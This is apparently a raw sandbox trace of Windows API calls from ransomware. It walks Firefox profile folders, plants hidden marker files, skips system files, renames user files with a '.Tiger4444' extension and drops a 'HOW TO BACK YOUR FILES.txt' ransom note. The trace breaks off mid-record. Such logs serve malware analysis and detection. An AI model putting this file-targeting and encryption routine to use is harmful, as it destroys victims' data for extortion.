lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0051.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0051.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0051.828] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0051.828] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0051.828] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3" [0051.828] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.833] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.835] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.837] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.837] CloseHandle (hObject=0x2ac) returned 1 [0051.838] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 61 [0051.838] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.838] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e8e9d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.838] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.838] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.838] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.838] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.838] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e8e9d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.838] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.838] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.838] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.838] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.838] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.838] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e8e9d2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e8e9d2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83eb4d78, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.838] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.838] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.838] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="events", cAlternateFileName="")) returned 1 [0051.838] lstrcmpiW (lpString1="events", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.838] lstrcmpiW (lpString1="events", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.838] lstrcmpiW (lpString1="events", lpString2="Tiger4444.exe") returned -1 [0051.838] lstrcmpiW (lpString1="events", lpString2=".") returned 1 [0051.838] lstrcmpiW (lpString1="events", lpString2="..") returned 1 [0051.838] lstrcmpiW (lpString1="events", lpString2="windows") returned -1 [0051.838] lstrcmpiW (lpString1="events", lpString2="bootmgr") returned 1 [0051.838] lstrcmpiW (lpString1="events", lpString2="pagefile.sys") returned -1 [0051.838] lstrcmpiW (lpString1="events", lpString2="boot") returned 1 [0051.839] lstrcmpiW (lpString1="events", lpString2="ids.txt") returned -1 [0051.839] lstrcmpiW (lpString1="events", lpString2="NTUSER.DAT") returned -1 [0051.839] lstrcpyW (in: lpString1=0x30aeb24, lpString2="events" | out: lpString1="events") returned="events" [0051.839] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0051.839] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8a) returned 0xc86318 [0051.839] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66568 [0051.839] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InstallTime20170824053622", cAlternateFileName="INSTAL~1")) returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="Tiger4444.exe") returned -1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2=".") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="..") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="windows") returned -1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="bootmgr") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="pagefile.sys") returned -1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="boot") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="ids.txt") returned 1 [0051.839] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="NTUSER.DAT") returned -1 [0051.839] lstrcpyW (in: lpString1=0x30aeb24, lpString2="InstallTime20170824053622" | out: lpString1="InstallTime20170824053622") returned="InstallTime20170824053622" [0051.839] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622", dwFileAttributes=0x0) returned 1 [0051.839] lstrlenW (lpString="InstallTime20170824053622") returned 25 [0051.839] lstrlenW (lpString="Tiger4444") returned 9 [0051.839] lstrcmpiW (lpString1="824053622", lpString2="Tiger4444") returned -1 [0051.839] lstrlenW (lpString=".dll") returned 4 [0051.839] lstrcmpiW (lpString1="3622", lpString2=".dll") returned 1 [0051.839] lstrlenW (lpString=".lnk") returned 4 [0051.839] lstrcmpiW (lpString1="3622", lpString2=".lnk") returned 1 [0051.839] lstrlenW (lpString=".ini") returned 4 [0051.839] lstrcmpiW (lpString1="3622", lpString2=".ini") returned 1 [0051.839] lstrlenW (lpString=".sys") returned 4 [0051.839] lstrcmpiW (lpString1="3622", lpString2=".sys") returned 1 [0051.839] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170824053622"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.840] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.840] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14329281827) returned 1 [0051.840] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=10) returned 1 [0051.840] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0051.840] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0051.840] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x2a4 [0051.841] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0xbe0000 [0051.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0051.842] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0051.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0051.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0051.843] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14329587390) returned 1 [0051.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0051.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0051.843] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.843] CloseHandle (hObject=0x2a4) returned 1 [0051.843] CloseHandle (hObject=0x2c8) returned 1 [0051.843] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622.Tiger4444") returned 97 [0051.843] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170824053622"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170824053622.tiger4444"), dwFlags=0x1) returned 1 [0051.844] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InstallTime20170824053622", cAlternateFileName="INSTAL~1")) returned 0 [0051.844] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.844] lstrcpyW (in: lpString1=0x30aeb24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.844] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.844] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.844] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.844] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.845] CloseHandle (hObject=0x2c8) returned 1 [0051.845] CloseHandle (hObject=0x2ac) returned 1 [0051.845] GetCurrentThreadId () returned 0xfa8 [0051.845] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0051.845] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0051.845] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86318 | out: hHeap=0xc50000) returned 1 [0051.845] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0051.845] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0051.845] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\" [0051.845] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3" [0051.845] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.846] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.849] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.850] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.851] CloseHandle (hObject=0x2ac) returned 1 [0051.851] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned 68 [0051.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.851] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83eb4d78, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d88 [0051.851] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.851] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.851] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.852] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.852] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83eb4d78, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.852] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.852] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.852] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.852] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.852] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.852] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83eb4d78, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83eb4d78, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83eb4d78, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.852] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.852] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.852] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83eb4d78, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83eb4d78, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83eb4d78, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.852] FindClose (in: hFindFile=0xc72d88 | out: hFindFile=0xc72d88) returned 1 [0051.852] lstrcpyW (in: lpString1=0x30aeb32, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.852] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.853] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.853] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.853] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.853] CloseHandle (hObject=0x2c8) returned 1 [0051.853] CloseHandle (hObject=0x2ac) returned 1 [0051.853] GetCurrentThreadId () returned 0xfa8 [0051.853] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0051.853] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions" [0051.853] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73980 | out: hHeap=0xc50000) returned 1 [0051.853] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0051.853] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions" [0051.853] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\" [0051.853] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3" [0051.854] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\extensions\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.854] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.857] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.858] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.858] CloseHandle (hObject=0x2ac) returned 1 [0051.858] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions") returned 50 [0051.858] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.858] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.859] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.859] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.859] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.859] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.859] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, 